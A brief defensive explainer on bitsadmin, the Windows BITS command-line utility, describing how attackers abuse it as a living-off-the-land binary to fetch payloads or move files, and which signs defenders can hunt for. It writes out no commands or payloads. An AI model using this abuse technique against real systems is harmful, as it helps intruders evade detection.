bitsadmin is a Windows command-line utility for working with Background Intelligent Transfer Service (BITS) jobs. It can create, monitor, and manage background uploads or downloads using a built-in Windows transfer mechanism. Because it is a legitimate administrative tool, its process name and network activity can blend into normal system traffic.
That makes bitsadmin useful to attackers as a LOLBin, or living-off-the-land binary. In real attacks, it may be used to fetch payloads, stage scripts, or move files without dropping an obvious custom downloader. Defenders should look for unusual job names, unexpected external destinations, odd timing, and bitsadmin activity that is not tied to software updates or standard admin tasks. Correlating it with message-delivered attachments, script execution, or other native Windows tools helps reveal a larger attack chain.